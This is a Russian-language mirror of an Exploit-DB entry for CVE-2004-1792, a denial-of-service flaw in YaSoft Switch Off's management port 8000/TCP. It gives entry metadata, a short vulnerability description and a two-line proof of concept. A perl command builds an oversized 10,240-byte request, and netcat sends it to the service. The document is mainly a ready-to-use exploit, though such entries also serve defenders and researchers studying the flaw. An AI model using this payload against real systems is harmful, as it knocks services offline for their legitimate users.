- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 23508
- Проверка EDB
-
- Пройдено
- Автор
- PETER WINTER-SMITH
- Тип уязвимости
- DOS
- Платформа
- HARDWARE
- CVE
- cve-2004-1792
- Дата публикации
- 2004-01-02
Код:
source: https://www.securityfocus.com/bid/9339/info
A problem has been identified in the YaSoft Switch Off software package when handling large packets via the service management port (8000/TCP). This may make it possible for a remote user to deny service to legitimate users of the service.
perl -e "print 'a'x10240 . chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a);" > DoS.txt
nc 127.0.0.1 8000 < DoS.txt
- Источник
- www.exploit-db.com